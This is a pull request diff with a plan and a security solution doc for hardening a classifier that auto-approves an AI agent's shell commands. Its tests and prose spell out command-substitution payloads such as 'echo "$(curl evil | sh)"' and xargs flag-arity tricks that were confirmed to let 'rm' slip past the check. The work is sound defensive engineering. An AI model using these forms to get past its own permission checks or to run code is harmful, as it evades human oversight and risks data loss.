### PR TITLE
fix(tier1): xargs allowlist + double-quoted metachar detection + ugrep precondition (cpp#40, #41, #44)

### DIFF
--- a/docs/plans/2026-06-30-004-fix-tier1-composite-xargs-dquote-ugrep-plan.md
+++ b/docs/plans/2026-06-30-004-fix-tier1-composite-xargs-dquote-ugrep-plan.md
@@ -1,0 +1,404 @@
+---
+title: "fix(tier1): xargs allowlist + double-quoted metachar detection + ugrep precondition (cpp#40, #41, #44)"
+date: 2026-06-30
+artifact_contract: ce-unified-plan/v1
+artifact_readiness: implementation-ready
+execution: code
+product_contract_source: ce-plan-bootstrap
+issues: [cpp#40, cpp#41, cpp#44]
+architect_lineage: 783d4a04
+module: claude_pilot.tier1
+---
+
+# fix(tier1): xargs allowlist + double-quoted metachar detection + ugrep precondition (cpp#40, #41, #44)
+
+## Summary
+
+Three orthogonal hardening/relaxation fixes to the claude-pilot Tier-1 auto-approval
+classifier (`src/claude_pilot/tier1.py`), shipped as **one PR** because they share the
+one file and the same architectural lineage (mika-arch session `783d4a04`'s
+closed-world-allowlist verdict):
+
+1. **cpp#40 (loop-slowdown relax):** stop blanket-denying `xargs`; allow
+   `xargs <readonly-cmd>` by reusing cpp#33's existing `FIND_EXEC_SAFE_COMMANDS`
+   closed-world allowlist — the same mechanism `find -exec` already uses.
+2. **cpp#41 (security harden):** `contains_unquoted_metacharacter` misses command
+   substitution (`$(`, backtick, `$'`) inside **double** quotes, so `grep "$(id)"`
+   auto-approves and bash executes `id`. Close the gap — double quotes do not
+   suppress substitution in bash; only single quotes do.
+3. **cpp#44 (precondition resolution):** record the resolution of the GNU-grep
+   precondition on `grep`/`egrep`/`fgrep` in `FIND_EXEC_SAFE_COMMANDS` — the
+   deployment containers resolve `find -exec` to GNU `/bin/grep` (verified by the
+   cpp#33 security review), so the ugrep `--filter=CMD` exec vector is not live in
+   the deployment target; the precondition is an accepted + tracked risk.
+
+All three honor the hard rules: closed-world allowlists only, no regex/lexing of
+inner content, no parser differential, `sh -c`/`bash -c` continues to deny
+everywhere, and the existing veto suite (446+ tests) is the regression floor.
+
+---
+
+## Problem Frame
+
+`tier1.py` is a pure, subprocess-free string classifier: it decides whether a Bash
+command is safe to auto-approve at Tier 1 (bypassing the LLM relay). It is the
+deliberate safety surface of the autonomous loop — over-blocking is the correct
+failure mode, but two of its current behaviors are wrong in opposite directions:
+
+- **Over-blocks `xargs` (cpp#40).** `xargs` is blanket-denied at TIER3
+  (`tier1.py:125`, `re.compile(r"\bxargs\b")`). The most common content-search shape
+  grooms use — `find … | xargs grep -l` — is denied even though it is exactly as
+  safe as `find … -exec grep -l`, which cpp#33 already opened up. Hard evidence:
+  mika#1639's auto-groom dispatch (claude-pilot session `25ab3b6c`, 2026-06-30,
+  $0.59 wasted) halted on `find ... -name "system_prompt.md" | xargs grep -l ...`.
+  Loop-slowdown class, n=4 in the permission-policy-errs-strict family.
+
+- **Under-blocks double-quoted substitution (cpp#41).** `contains_unquoted_metacharacter`
+  (`tier1.py:292`) only flags `$(`/backtick/`$'` in **unquoted** regions. Inside a
+  double-quoted region (`tier1.py:313–321`) it handles only the `\"` escape and the
+  closing quote — it never scans for substitution markers. But bash performs
+  command substitution inside double quotes, so any safe-listed command carrying
+  `"$(…)"` auto-approves and executes the inner command. Hard repro (cpp#41 body,
+  against `main`): `grep "$(id)"` → `cum=False safe=True` while bash runs `id`.
+  Security class. The `find -exec` path is already independently guarded
+  (`_is_safe_find_command` denies on any `$(`/backtick/`$'`, `tier1.py:571`), so this
+  is the residual gap for every *other* safe-listed command.
+
+- **Undocumented-resolution precondition (cpp#44).** `FIND_EXEC_SAFE_COMMANDS`
+  includes `grep`/`egrep`/`fgrep`, which are read-only **only under GNU grep**.
+  ugrep (a drop-in `grep` common on Gentoo — this dev host runs ugrep 7.5.0
+  interactively) exposes `--filter=CMD`/`--pager`/`--view`, which execute commands —
+  the same RCE class that got `rg` removed in cpp#33. A LOAD-BEARING PRECONDITION
+  comment already exists at `tier1.py:504–511` (added by cpp#33) naming cpp#44 as
+  the tracking issue. cpp#44's deliverable is to *close that tracking loop*: record
+  the verification result and the accepted-risk decision.
+
+---
+
+## Requirements
+
+- **R1 (cpp#40):** `xargs <cmd>` auto-approves iff `<cmd>` (the first non-flag token
+  after `xargs`) is in `FIND_EXEC_SAFE_COMMANDS`. The allowlist constant is reused,
+  not duplicated.
+- **R2 (cpp#40):** `xargs` flag forms (`-I {}`, `-n N`, `-P N`, `-0`, `-d <delim>`,
+  `-r`, `-a <file>`, long `--max-args=N` etc.) are skipped structurally to find the
+  inner command. No lexing of the inner command's own arguments.
+- **R3 (cpp#40):** `xargs sh -c` / `xargs bash -c` / `xargs sudo …` / `xargs rm` continue
+  to DENY. `\bxargs\b` is removed from `TIER3_PATTERNS`.
+- **R4 (cpp#40):** `DENIED_BASH_PATTERNS_HINT` no longer tells the model `xargs` is
+  categorically denied; it reflects that `xargs <readonly-cmd>` is allowed.
+- **R5 (cpp#41):** `contains_unquoted_metacharacter` returns `True` for `$(`,
+  backtick, and `$'` appearing inside a double-quoted region; single-quoted regions
+  stay inert; the `\"` escape inside double quotes is preserved (an escaped quote
+  does not close the region).
+- **R6 (cpp#41):** the Rust mirror (`permission_pre_classifier.rs`) is **out of
+  scope** — tracked separately as a paired audit. The function's docstring is
+  updated to note the Python side now diverges (intentionally hardened) until the
+  Rust side mirrors.
+- **R7 (cpp#44):** the `FIND_EXEC_SAFE_COMMANDS` comment block states cpp#44's
+  resolution: deployment target verified GNU grep, vector not live there, accepted +
+  tracked risk, no inner-argument lexing (per solution-doc §4).
+- **R8 (docs):** the three learnings are folded into
+  `docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md`.
+- **R9 (regression floor):** the existing veto suite stays green; new tests cover
+  every AC below; the total test count grows.
+
+---
+
+## Key Technical Decisions
+
+**KTD1 — Reuse `FIND_EXEC_SAFE_COMMANDS`, do not introduce a parallel xargs allowlist.**
+cpp#40's body and the architect lineage both mandate one closed-world allowlist
+serving both `find -exec <cmd>` and `xargs <cmd>`. Same read-only premise, same
+entries, same audit surface. A second constant would drift.
+
+**KTD2 — Plumb xargs through the existing `is_safe_shell_command` dispatch, mirroring `find`.**
+`find` is special-cased at `tier1.py:586` (`if cmd == "find": return _is_safe_find_command(sub)`).
+Add `xargs` to `SAFE_SHELL_COMMANDS` and a sibling `if cmd == "xargs": return
+_is_safe_xargs_command(sub)` branch. This keeps the compound-split + per-segment
+chain-safety machinery (`_split_compound_command` → `_is_safe_sub_command`) intact:
+`find … | xargs grep -l` splits on `|` and each side is validated independently
+(`find …` via `_is_safe_find_command`, `xargs grep -l` via the new helper).
+Rationale for this over a branch in `_is_safe_sub_command`: `is_safe_shell_command`
+already owns the `SAFE_SHELL_COMMANDS` membership gate and the find special-case, so
+xargs belongs next to its sibling, not in the dispatcher above it.
+
+**KTD3 — xargs flag-skipping is structural, not a bash lexer.** Walk
+whitespace-split tokens after `xargs`; skip tokens that look like flags
+(`-`-prefixed) and, for the value-taking short flags (`-I`, `-n`, `-P`, `-d`, `-s`,
+`-L`, `-a`, `-E`), skip the following token when the value is not attached. The
+first token that is not a flag (and not a consumed flag-value) is the inner command.
+This is the same "structural pattern matching, not bash grammar" posture cpp#33's
+`_FIND_EXEC_INNER_RE` uses. If parsing is ambiguous (no inner token found), DENY
+(fall through to relay) — over-block is the safe default.
+
+**KTD4 — cpp#41 fix is the minimal quote-state-machine change.** In the double-quoted
+branch of `contains_unquoted_metacharacter`, after handling the `\"` escape and the
+closing `"`, also test for `` ` ``, `$(`, and `$'` and return `True`. Do **not**
+touch `_split_compound_command`'s quote machine — it has a different job (segment
+splitting) and double-quoted substitution markers there are not metacharacters for
+*its* purpose. The two machines stay independent (they already document mirroring
+each other only for quote/escape handling, not metachar detection).
+
+**KTD5 — cpp#44 is documentation-only in `tier1.py`; no runtime ugrep check is added here.**
+`tier1.py` is a deliberately pure, subprocess-free string classifier (load-bearing
+for testability and for the hot-path purity the whole module depends on). A
+`grep --version` subprocess probe does not belong in it. AC44.1 (the precondition
+comment) already exists from cpp#33; cpp#44's substantive deliverable — verifying the
+deployment grep provider — was already performed by the cpp#33 security review (cited
+in the cpp#44 body: GNU `/bin/grep` 3.12 rejects `--filter`). So the resolution is to
+record that decision in the comment. The optional runtime warning (AC44.2) is
+**declined** for module purity and surfaced as a clean follow-up: a startup-time
+ugrep-detection warning belongs in `cli.py`, not the classifier. This is the brief's
+own blessed fallback ("document-only is acceptable").
+
+**KTD6 — Defense-in-depth, not behavior change, for the find path.** cpp#41's fix
+makes `contains_unquoted_metacharacter` catch double-quoted `$()` that the find path
+*already* caught via its own `"$(" in sub` guard. After this change the find path is
+guarded by both. No find AC changes; the existing `find -exec grep "$(id)"` veto
+tests stay green.
+
+---
+
+## Implementation Units
+
+### U1. cpp#40 — allow `xargs <readonly-cmd>` via the shared allowlist
+
+**Goal:** Remove the blanket `xargs` TIER3 deny and auto-approve `xargs <cmd>` when
+the inner command is in `FIND_EXEC_SAFE_COMMANDS`.
+
+**Requirements:** R1, R2, R3, R4.
+
+**Dependencies:** none (FIND_EXEC_SAFE_COMMANDS already exists at `tier1.py:512`).
+
+**Files:**
+- `src/claude_pilot/tier1.py` (modify)
+- `tests/test_tier1.py` (add tests)
+
+**Approach:**
+- Remove `re.compile(r"\bxargs\b")` from `TIER3_PATTERNS` (`tier1.py:125`). Leave the
+  surrounding NOTE comments coherent.
+- Add `_is_safe_xargs_command(sub: str) -> bool` near `_is_safe_find_command`
+  (`tier1.py:539`). It strips the leading `xargs` token, skips flags per KTD3,
+  extracts the first inner command token, and returns
+  `inner in FIND_EXEC_SAFE_COMMANDS`. Mirror `_is_safe_find_command`'s guard against
+  command substitution: if `$(`/backtick/`$'` appears in `sub`, return `False`
+  (defense in depth; cpp#41 also covers this at the scanner layer). Return `False`
+  when no inner command is found (ambiguous → deny).
+- Add `"xargs"` to `SAFE_SHELL_COMMANDS` (`tier1.py:465`) and a
+  `if cmd == "xargs": return _is_safe_xargs_command(sub)` branch in
+  `is_safe_shell_command` (`tier1.py:586`, beside the `find` branch).
+- Update `DENIED_BASH_PATTERNS_HINT` (`tier1.py:196`): change the `xargs` bullet so it
+  no longer lists `xargs` as categorically denied; note that `xargs <readonly-cmd>`
+  (inner in the read-only allowlist) is auto-approved, mirroring the `find … -exec`
+  bullet's framing, while `xargs sh -c`/`bash -c`/`sudo`/`rm` still crash the session.
+
+**Patterns to follow:** `_is_safe_find_command` + `_FIND_EXEC_INNER_RE` (`tier1.py:536–574`)
+for closed-world inner matching and the substitution guard; the `find` special-case in
+`is_safe_shell_command` (`tier1.py:586`).
+
+**Test scenarios** (`tests/test_tier1.py`, new section mirroring `test_find_exec_*`):
+- `xargs grep -l "foo" < input.txt` → `is_safe_bash_command` True (AC40.1).
+- `find . -name "*.md" | xargs grep -l "foo"` → True (AC40.2, composition; both
+  segments validate).
+- `xargs -I {} grep "foo" {}` → True (AC40.3, `-I {}` flag skipped).
+- `xargs -n 1 cat` → True; `xargs -0 grep x` → True; `xargs -P 4 head` → True
+  (AC40.4 flag variants where inner is allowlisted).
+- `xargs rm` → False (AC40.4, rm not allowlisted).
+- `xargs sh -c 'id'` → False; `xargs bash -c 'id'` → False (AC40.5, shell wrapper —
+  inner not allowlisted; also still TIER3-caught by the `sh -c`/`bash -c` patterns).
+- `xargs sudo whoami` → False (AC40.6).
+- `is_tier3_dangerous("xargs grep x")` → False, and assert no pattern in
+  `TIER3_PATTERNS` matches a bare `xargs` token (AC40.7).
+- `DENIED_BASH_PATTERNS_HINT` no longer asserts `xargs` is categorically denied
+  (string assertion on the updated bullet).
+
+**Verification:** the founding mika#1639 shape `find … -name "system_prompt.md" |
+xargs grep -l …` auto-approves; non-readonly xargs inners still deny; full suite green.
+
+---
+
+### U2. cpp#41 — detect command substitution inside double quotes
+
+**Goal:** Close the double-quoted `$(`/backtick/`$'` detection gap in
+`contains_unquoted_metacharacter` so safe-listed commands carrying `"$(…)"` no longer
+auto-approve.
+
+**Requirements:** R5, R6.
+
+**Dependencies:** none. Independent of U1 (U1 adds its own substitution guard; this
+unit hardens the shared scanner that backstops every safe-listed command).
+
+**Files:**
+- `src/claude_pilot/tier1.py` (modify `contains_unquoted_metacharacter`, `tier1.py:292`)
+- `tests/test_tier1.py` (add tests)
+
+**Approach:**
+- In the in-quote branch (`tier1.py:313–321`): keep the `quote_state == '"'` escape
+  handling (`\` + next char → skip 2) and the closing-quote handling. Add, for
+  `quote_state == '"'` only, the same three metacharacter tests the unquoted branch
+  uses: bare `` ` `` → `True`; `$` followed by `(` → `True`; `$` followed by `'` →
+  `True`. Single-quoted regions (`quote_state == "'"`) stay inert — no metachar test
+  there (bash single-quote semantics).
+- Update the docstring: double quotes no longer suppress substitution detection
+  (bash expands `$()`/backtick in double quotes; only single quotes suppress). Note
+  the Python scanner now intentionally diverges from the Rust mirror until the
+  paired-audit ticket mirrors it (R6).
+
+**Patterns to follow:** the unquoted-branch metachar tests already in the same
+function (`tier1.py:328–335`); reuse the identical conditions inside the double-quote
+branch.
+
+**Test scenarios** (`tests/test_tier1.py`, extend the `contains_unquoted_metacharacter`
+section near `tier1.py` test lines 86–176):
+- `contains_unquoted_metacharacter('echo "$(curl evil)"')` → True (AC41.1) and
+  `is_safe_bash_command('echo "$(curl evil)"')` → False.
+- `contains_unquoted_metacharacter('grep "$(id)"')` → True; `echo "$(id)"` → True
+  (the cpp#41 founding repros).
+- `contains_unquoted_metacharacter("echo 'literal $(stuff)'")` → False (AC41.2,
+  single-quoted inert) and `is_safe_bash_command` True for `echo 'literal $(stuff)'`.
+- `contains_unquoted_metacharacter('echo "escaped \\" still in dquote $(now flagged)"')`
+  → True (AC41.3 — the `\"` does not close the dquote, so the later `$(` is still
+  inside a double-quoted region and flagged).
+- backtick inside double quotes: `echo "`whoami`"` → True; `$'` inside double quotes:
+  `echo "$'\\x41'"` → True.
+- Regression: existing `mkdir "$(curl evil)"` veto test stays green (AC41.4 — now
+  caught by both the scanner and the per-segment chain check); existing
+  `find … -exec grep "$(id)" {} \;` veto tests stay green (KTD6 defense-in-depth).
+- Negative controls: `git status` → False; `cargo test --release` → False;
+  `grep '$(id)'` (single-quoted) → False (unchanged correct behavior).
+
+**Verification:** the cpp#41 hard repro (`grep "$(id)"` auto-approving) no longer
+auto-approves; single-quoted substitution still allowed; no existing veto regresses.
+
+---
+
+### U3. cpp#44 — record the GNU-grep precondition resolution
+
+**Goal:** Close cpp#44's tracking loop by stating the precondition resolution in the
+`FIND_EXEC_SAFE_COMMANDS` comment: deployment verified GNU grep, ugrep vector not
+live there, accepted + tracked risk, no inner-argument lexing.
+
+**Requirements:** R7.
+
+**Dependencies:** none.
+
+**Files:**
+- `src/claude_pilot/tier1.py` (extend the comment at `tier1.py:504–511`)
+
+**Approach:**
+- Extend the existing LOAD-BEARING PRECONDITION comment to state the resolution
+  (not just the tracking pointer): (a) the cpp#33 security review empirically
+  verified the deployment containers resolve `find -exec` to GNU `/bin/grep` 3.12,
+  which rejects `--filter`/`--pager`/`--view`; (b) therefore the ugrep exec vector is
+  not live in the deployment target; (c) the precondition is an accepted + tracked
+  risk — grep/egrep/fgrep stay in the allowlist; (d) the hardening boundary: never
+  denylist `--filter`/`--pager`/`--view` by inner-argument parsing (solution-doc §4);
+  if a ugrep host ever enters scope, drop the grep-family entries instead; (e) a
+  runtime startup ugrep-detection warning is a possible future defense-in-depth in
+  `cli.py` (not the pure classifier), deliberately not added here.
+
+**Patterns to follow:** the existing comment block's tone and the solution-doc §6
+"environmental precondition documented next to the survivors" framing.
+
+**Test expectation: none — comment-only change, no behavioral effect.** Covered by R9
+(the full suite stays green, proving no accidental behavior change).
+
+**Verification:** the comment unambiguously states cpp#44 is resolved (verified +
+accepted-risk), and a reader can tell why grep-family entries are kept and what would
+change that decision.
+
+---
+
+### U4. Extend the command-string-policy solution doc
+
+**Goal:** Fold the three learnings into the existing security-issues solution doc so
+the next person touching the classifier inherits them.
+
+**Requirements:** R8.
+
+**Dependencies:** U1, U2, U3 (documents what they establish).
+
+**Files:**
+- `docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md` (modify)
+
+**Approach:**
+- **§4 (closed-world allowlist, never lex the inside):** add that the same allowlist
+  now backs `xargs <cmd>` as well as `find -exec <cmd>` — one closed-world set, two
+  structural front-ends (cpp#40). The structural flag-skipping is pattern matching,
+  not lexing.
+- **§1 or a new sub-point near the substitution-marker guidance:** record the
+  double-quoted-substitution detection gap and its closure — double quotes do NOT
+  suppress `$()`/backtick/`$'` in bash; a quote-state scanner must only treat single
+  quotes as suppressing (cpp#41). Note the Python/Rust divergence pending the paired
+  audit.
+- **§6 (read-only PREMISE + environmental precondition):** record cpp#44's resolution
+  — grep-family entries kept under the verified GNU-grep deployment precondition;
+  ugrep `--filter` is the documented environmental hazard; the resolution is
+  accepted-risk + tracked, never inner-arg denylisting.
+- Update frontmatter: bump `last_updated` to 2026-06-30 and add
+  `claude-pilot-40`, `claude-pilot-41`, `claude-pilot-44` to `tags`; add `xargs` and
+  `ugrep` tags.
+
+**Patterns to follow:** the existing numbered-section structure and the WRONG/RIGHT
+code-comment idiom already in §4/§6.
+
+**Test expectation: none — documentation.** Satisfies the verify-pipeline docs bucket
+alongside the plan.
+
+**Verification:** the doc names all three cpp tickets and the three learnings; a
+reader planning a future allowlist change finds the xargs/ugrep/double-quote
+precedents.
+
+---
+
+## Assumptions
+
+- **xargs default-command is `echo`.** Bare `xargs` with no command runs `echo` by
+  default. `_is_safe_xargs_command` treats a bare `xargs` (no inner token) as DENY
+  (ambiguous → over-block), which is safe and matches the "no inner found → deny"
+  rule in KTD3. Not auto-approving the rare bare-`xargs` form is an acceptable
+  over-block.
+- **`-d <delim>` / `-E <eof>` value forms.** The structural skipper consumes the
+  value token for value-taking short flags whether attached (`-d,`) or separate
+  (`-d ,`). GNU long forms (`--delimiter=,`) are single tokens and skip cleanly. If a
+  novel flag form defeats the skipper, the result is over-block (deny), never
+  under-block.
+- **No new entries to `FIND_EXEC_SAFE_COMMANDS`.** Out of scope; the xargs path reuses
+  the set exactly as-is.
+
+---
+
+## Scope Boundaries
+
+In scope: `src/claude_pilot/tier1.py`, `tests/test_tier1.py`, and the one
+security-issues solution doc.
+
+Out of scope (do not touch):
+- `src/claude_pilot/permissions.py` — cpp#47/#38/#42 territory, parallel-safe; this PR
+  must not modify it.
+- The Rust mirror `crates/mika-agent/src/server/permission_pre_classifier.rs` — the
+  cpp#41 paired-audit candidate is a separate ticket in the mika repo.
+
+### Deferred to Follow-Up Work
+- **Runtime ugrep-detection warning (cpp#44 AC44.2).** A startup-time check in
+  `cli.py` that warns when `grep` resolves to ugrep. Deliberately not added here to
+  keep `tier1.py` a pure subprocess-free classifier; clean follow-up if a ugrep host
+  ever enters scope.
+- **Rust `permission_pre_classifier.rs` double-quoted-substitution mirror.** Paired
+  audit; file/track on the mika repo so the F5 sentinel contract is restored.
+
+---
+
+## Definition of Done
+
+- `xargs <readonly-cmd>` auto-approves; `xargs rm`/`sh -c`/`bash -c`/`sudo` deny;
+  `\bxargs\b` gone from `TIER3_PATTERNS`; hint text updated (AC40.1–40.7).
+- `contains_unquoted_metacharacter` flags double-quoted `$(`/backtick/`$'`;
+  single-quoted stays inert; `\"` escape preserved (AC41.1–41.4).
+- `FIND_EXEC_SAFE_COMMANDS` comment states cpp#44's verified + accepted-risk
+  resolution (AC44.1; AC44.2 explicitly declined with rationale).
+- Solution doc carries all three learnings; frontmatter updated.
+- `uv run ruff check`, `uv run mypy src`, `uv run pytest` all pass; the existing
+  veto suite (446+) stays green and the total test count grows.
+- `scripts/verify-pipeline.sh` passes (docs + source buckets both present).

--- a/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
+++ b/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
@@ -7,7 +7,7 @@ component: permission-classifier
 problem_type: security_issue
 category: security-issues
 severity: critical
-tags: [permissions, policy, bash, regex, heredoc, allow-list, rce, symlink, toctou, command-substitution, find-exec, ref-resolution, make, funsub, bash-5.3, claude-pilot-25, claude-pilot-33, claude-pilot-34, claude-pilot-35, claude-pilot-37, claude-pilot-43, claude-pilot-45, claude-pilot-47]
+tags: [permissions, policy, bash, regex, heredoc, allow-list, rce, symlink, toctou, command-substitution, find-exec, xargs, ugrep, double-quote, ref-resolution, make, funsub, bash-5.3, claude-pilot-25, claude-pilot-33, claude-pilot-34, claude-pilot-35, claude-pilot-37, claude-pilot-40, claude-pilot-41, claude-pilot-43, claude-pilot-44, claude-pilot-45, claude-pilot-47]
 applies_when: "adding or reviewing any rule that decides allow/deny on a raw shell command string"
 ---
 
@@ -233,8 +233,15 @@ Two allowlist entries violated that:
 - `grep`/`egrep`/`fgrep` are read-only **only under GNU grep**. `ugrep` (a drop-in
   `grep` on some Gentoo/BSD/Homebrew hosts) adds `--filter=CMD` / `--pager` /
   `--view`. Kept (the founding use case *is* `find -exec grep`), but the GNU-grep
-  assumption is now a documented **load-bearing precondition** in the allowlist
-  comment, with claude-pilot#44 tracking the runtime grep-provider check.
+  assumption is a documented **load-bearing precondition** in the allowlist
+  comment. **Resolved (claude-pilot#44):** the cpp#33 security review empirically
+  verified the deployment containers resolve `find -exec` to GNU `/bin/grep` 3.12
+  (which rejects `--filter`), so the ugrep vector is not live in the deployment
+  target; the precondition is an **accepted + tracked risk**, not an open bug. The
+  hardening boundary is fixed: if a ugrep-as-`grep` host ever enters scope, **drop**
+  the grep-family entries — never denylist `--filter`/`--pager`/`--view` by parsing
+  inner args (§4). A startup-time ugrep-detection warning, if ever wanted, belongs
+  in `cli.py`, not the pure subprocess-free classifier.
 
 ```python
 # WRONG — "they're search tools, they're read-only"
@@ -261,6 +268,18 @@ The unifying rule: a closed-world allowlist fails open in two places a name list
 hides — an *entry* whose own flags exec/write, and an *action* of a multi-action
 command that the guard didn't enumerate. Verify the premise of each entry; deny
 the unknown action.
+
+**One allowlist, multiple front-ends (claude-pilot#40).** `xargs <cmd>` runs `<cmd>`
+per stdin record — the same "the inner token is the binary that executes" shape as
+`find -exec`. So the blanket `xargs` TIER3 deny was relaxed by **reusing the SAME
+`FIND_EXEC_SAFE_COMMANDS` set**, not by introducing a parallel xargs allowlist.
+`_is_safe_xargs_command` skips xargs' own flags structurally (`-I {}`, `-n N`,
+`-P N`, `-0`, `-d <delim>`, …) to find the first non-flag token, then matches it
+exact-literal against the shared set — never lexing the inner command's arguments
+(§4 discipline). One consequence to keep in mind: the grep-family GNU-grep
+precondition above now governs **both** `find -exec grep` and `xargs grep`. When an
+allowlist gets a second consumer, the read-only premise of every entry must hold for
+the new front-end too — here it does, because both run the inner command directly.
 
 ### 7. A regex's syntactic shape is not a runtime-identity guarantee — document what the matched bytes can REFER TO, not what they look like
 
@@ -386,6 +405,54 @@ Generalization: when a marker set encodes "the dangerous forms of X", record the
 bump. The symmetric `permission_pre_classifier.rs` in mika (see Related) is the same
 class and the same re-audit candidate.
 
+### 10. A quote-aware substitution scanner must suppress on SINGLE quotes only — double quotes do NOT make `$(`/backtick inert
+
+`contains_unquoted_metacharacter` (tier1) is the scanner that backstops every
+safe-listed command against command substitution. Its original quote state machine
+treated **both** quote kinds as suppressing: inside `"…"` it scanned only for the
+escape pair and the closing quote, never for substitution markers. But bash performs
+command substitution **inside double quotes** — only single quotes are literal. So
+`grep "$(id)"` / `echo "$(curl evil | sh)"` returned `cum=False`, auto-approved, and
+bash ran the inner command — an RCE for any safe-listed leaf (claude-pilot#41,
+empirically reproduced on `main`). The `find -exec` path was *independently* safe
+(its own `"$(" in sub` guard, §6), so this was the residual hole for every other
+command.
+
+The fix is to scan double-quoted regions for the markers bash actually expands
+there, while keeping single-quoted regions fully inert:
+
+```python
+# Inside a double-quoted region, after the \X escape-pair skip and the close check:
+if quote_state == '"':
+    if ch == "`":                                   return True
+    if ch == "$" and peek == "(":                   return True
+    # NOTE: $' is NOT flagged inside double quotes — ANSI-C $'...' quoting is only
+    # recognized OUTSIDE quotes; inside "..." it is a literal $ + apostrophe.
+```
+
+Three subtleties that make this correct, not just "scan everywhere":
+
+1. **Single quotes still suppress.** `echo '$(literal)'` stays allowed — bash treats
+   single-quoted content as literal. Only the double-quote branch gains the markers.
+2. **The `\X` escape pair already does the right thing.** A backslash inside double
+   quotes suppresses `$`/backtick (`"\$(x)"` is literal), and the pre-existing pair
+   skip consumes `\X` before the marker test — so a *suppressed* substitution is
+   correctly NOT flagged, and `\"` correctly does not close the region (markers after
+   it stay flagged).
+3. **`$'` is quote-context-dependent, unlike `$(`/backtick.** ANSI-C `$'…'` quoting is
+   only a thing *outside* quotes; inside `"…"` it's inert. So the `$'` marker stays in
+   the unquoted branch only (mika#944) — flagging it inside double quotes would be a
+   false positive. The "treat the marker the same regardless of quoting" shorthand is
+   right for `$(`/backtick and *wrong* for `$'`; verify each marker against the shell,
+   don't generalize the rule across markers.
+
+This is a real behavior change, not just a hole-plug: a `mika ask` brief whose
+markdown carries inline-code backticks **inside double quotes** now routes to the
+relay instead of auto-approving (correct — bash would substitute them). Briefs that
+must auto-approve should single-quote the payload. The Rust mirror
+(`permission_pre_classifier.rs`) has the same gap and is the paired-audit follow-up;
+the Python side intentionally diverges (hardened) until the Rust side mirrors.
+
 ## When to Apply
 
 - Adding/reviewing any `permissions.yaml` rule, or any code deciding allow/deny on
@@ -404,6 +471,14 @@ class and the same re-audit candidate.
 - A major shell/runtime version bump: re-audit the substitution marker set against the
   new grammar — bash 5.3's K-style funsub `${ … }` was a new injection form the
   original `$(`/backtick/`$'` set did not cover (§9).
+- Writing or reviewing a quote-aware substitution scanner: suppress markers on SINGLE
+  quotes only — double quotes still expand `$(`/backtick — and verify each marker
+  against the shell rather than generalizing one marker's quoting rule to all (`$'` is
+  inert inside double quotes; `$(`/backtick are not) (§10).
+- Relaxing a blanket deny by reusing an existing allowlist for a new front-end (e.g.
+  `xargs` reusing `FIND_EXEC_SAFE_COMMANDS`): re-confirm every entry's read-only
+  premise holds for the new consumer, and skip the new command's flags structurally,
+  never lexing the inner command (§4, §6).
 - Reviewing `tier1.py` / `policy.py` / `permissions.py` in claude-pilot.
 
 ## Related
@@ -415,12 +490,13 @@ class and the same re-audit candidate.
   (`contains_unquoted_metacharacter` mirrors tier1; mika#944/#946). The
   denylist-incompleteness and the `awk`/`sed`/`find` `system()`-exec gap likely
   exist symmetrically there.
-- **Open follow-ups from §6 (claude-pilot#33):** claude-pilot#41 — the broader
-  `contains_unquoted_metacharacter` gap (it misses `$()`/backtick **inside double
-  quotes**, so `echo "$(curl evil|sh)"` auto-approves on the non-find path;
-  another paired-audit candidate with the Rust scanner). claude-pilot#44 — verify
-  the pilot container's `grep` provider is GNU grep, the load-bearing precondition
-  for keeping `grep`/`egrep`/`fgrep` on `FIND_EXEC_SAFE_COMMANDS`.
+- **Resolved follow-ups from §6 (claude-pilot#33):** claude-pilot#41 — the broader
+  `contains_unquoted_metacharacter` gap (missed `$()`/backtick **inside double
+  quotes**) is **fixed on the Python side** (§10); the Rust scanner mirror remains a
+  paired-audit follow-up. claude-pilot#40 — `xargs <readonly-cmd>` now reuses the same
+  `FIND_EXEC_SAFE_COMMANDS` allowlist (§6). claude-pilot#44 — the GNU-grep precondition
+  for `grep`/`egrep`/`fgrep` is **resolved** (verified GNU grep in the deployment
+  containers; accepted + tracked risk; §6).
 - Accepted residuals (not bugs): in-worktree code execution (`node ./build.js`,
   `cargo test`, `uv run pytest` run project code — the worktree is the trust
   boundary); `npm install`/`uv add` run package scripts; **symlink/TOCTOU on any

--- a/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
+++ b/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
@@ -281,6 +281,30 @@ precondition above now governs **both** `find -exec grep` and `xargs grep`. When
 allowlist gets a second consumer, the read-only premise of every entry must hold for
 the new front-end too — here it does, because both run the inner command directly.
 
+**"Structural flag-skipping" IS a parser differential — and the security review
+proved it (cpp#40, two P0s found post-implementation).** The first cut called the
+flag-skipper "structural pattern matching, not a bash lexer" and assumed that made
+it safe. But to *skip* a flag you must know its **arity**, and a flag-arity table is
+a parser model of `getopt` — diverge from real `getopt` and the inner command moves.
+Two divergences each auto-approved `rm` (confirmed live):
+- **Optional-argument short flags** (`-e[eof]`/`-i[replace]`/`-l[lines]`): `getopt`
+  takes their value ONLY when attached (`-i{}`), never as a separate token. Modeling
+  them as separate-value made `xargs -i rm cat` skip `-i` **and** `rm` (the real
+  command, read as `-i`'s value) and allow on `cat`.
+- **Separate-value long options** (`--arg-file cat`): `getopt_long` accepts the value
+  as a separate token, not only `=form`. Assuming `=form`-only made `xargs --arg-file
+  cat rm` skip just `--arg-file`, land on `cat`, and allow while xargs runs `rm`.
+
+The fix direction is the same closed-world instinct applied to **arity**: enumerate
+only the flags whose arity you're certain of (`getopt` *required*-argument short
+flags), treat every *uncertain* token as the command (deny if mutating), and **deny
+on any construct whose arity you can't determine** — a bare `--long` (unknowable
+without the full option table) denies; only `--`-terminated or `=form` inner commands
+are admitted. Over-block on arity uncertainty, never under-block. Lesson: skipping
+tokens by flag class is parsing; hold it to the same "no parser differential" bar as
+§2/§4, and pin it with executed-exploit review (§3) against the **real** `getopt`,
+not your model of it.
+
 ### 7. A regex's syntactic shape is not a runtime-identity guarantee — document what the matched bytes can REFER TO, not what they look like
 
 The `bash-git-show-redirect` rule (§5, cpp#35) matches `^git show [a-f0-9]+:`.
@@ -477,8 +501,11 @@ the Python side intentionally diverges (hardened) until the Rust side mirrors.
   inert inside double quotes; `$(`/backtick are not) (§10).
